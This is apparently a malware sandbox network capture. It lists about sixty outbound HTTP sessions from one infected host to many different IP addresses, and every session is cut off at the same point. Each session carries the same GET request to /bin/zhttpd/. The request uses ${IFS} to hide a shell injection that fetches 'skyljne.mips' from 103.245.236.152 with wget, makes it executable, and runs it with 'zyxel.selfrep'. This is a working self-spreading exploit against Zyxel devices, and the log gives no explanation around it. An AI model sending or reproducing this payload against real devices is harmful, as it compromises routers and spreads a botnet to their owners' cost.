                                          Jan 14, 2024 15:46:15.982177019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4201192.168.2.233838018.118.225.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982213974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4202192.168.2.2352832216.242.119.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982234955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4203192.168.2.2335588195.205.174.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982245922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4204192.168.2.2347168179.133.232.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982284069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4205192.168.2.2350846201.134.54.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982333899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4206192.168.2.236037077.41.117.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982335091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4207192.168.2.234214448.43.20.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982335091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4208192.168.2.234744261.57.11.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982346058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4209192.168.2.2347126128.252.26.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982369900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4210192.168.2.2352376206.242.85.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982378006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4211192.168.2.2336638192.109.180.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982393980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4212192.168.2.2344754173.102.91.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982436895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4213192.168.2.2353206183.78.75.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982475996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4214192.168.2.2351380154.12.136.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982475996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4215192.168.2.235069658.217.159.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982502937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4216192.168.2.2347440220.166.127.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982512951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4217192.168.2.2348938130.207.32.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982528925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4218192.168.2.2354082128.190.163.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982574940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4219192.168.2.233809425.69.227.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982609987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4220192.168.2.236062032.47.228.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982626915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4221192.168.2.235794676.226.239.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982656002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4222192.168.2.2356806187.7.121.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982695103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4223192.168.2.2337146183.238.160.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982733011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4224192.168.2.2352424173.180.225.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982753992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4225192.168.2.2352634219.197.81.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982788086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4226192.168.2.2355232119.42.71.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982819080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4227192.168.2.2342506200.90.15.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982846975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4228192.168.2.23365041.224.138.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982876062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4229192.168.2.2342410211.100.254.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982882977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4230192.168.2.2360354202.202.225.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982902050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4231192.168.2.234841066.154.22.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982961893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4232192.168.2.2355998192.206.203.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.982988119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4233192.168.2.235196017.52.188.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983028889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4234192.168.2.234576443.23.141.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983036041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4235192.168.2.235004644.35.43.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983056068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4236192.168.2.236042238.181.47.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983067036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4237192.168.2.2337056155.89.137.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983098984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4238192.168.2.2360528189.18.16.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983107090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4239192.168.2.2337000146.206.201.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983159065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4240192.168.2.235125444.149.5.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983186007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4241192.168.2.2336062124.198.63.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983206987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4242192.168.2.2349268184.197.37.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983231068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4243192.168.2.234978266.86.247.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983232975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4244192.168.2.2349508155.248.54.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983274937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4245192.168.2.2352076153.207.44.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983274937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4246192.168.2.2343470149.210.70.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983299017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4247192.168.2.2341594208.95.192.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983335972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4248192.168.2.2357462129.164.149.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983378887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4249192.168.2.233318852.157.186.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983398914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4250192.168.2.2345320118.73.61.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983407974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4251192.168.2.2354368197.82.99.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983454943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4252192.168.2.235249045.20.46.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983484030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4253192.168.2.2340130149.130.87.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983530998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4254192.168.2.234204299.171.5.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983551979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4255192.168.2.235657881.48.97.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983596087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4256192.168.2.235164488.83.125.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983623028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4257192.168.2.235053832.4.165.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983671904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4258192.168.2.235434427.31.216.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983685970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4259192.168.2.233400219.170.56.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983730078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4260192.168.2.2334626220.180.68.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983748913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4261192.168.2.2347864212.152.189.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983772993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4262192.168.2.2335306138.107.123.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983815908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4263192.168.2.2357962180.186.231.232443
                                          TimestampBytes transferredDirectionData
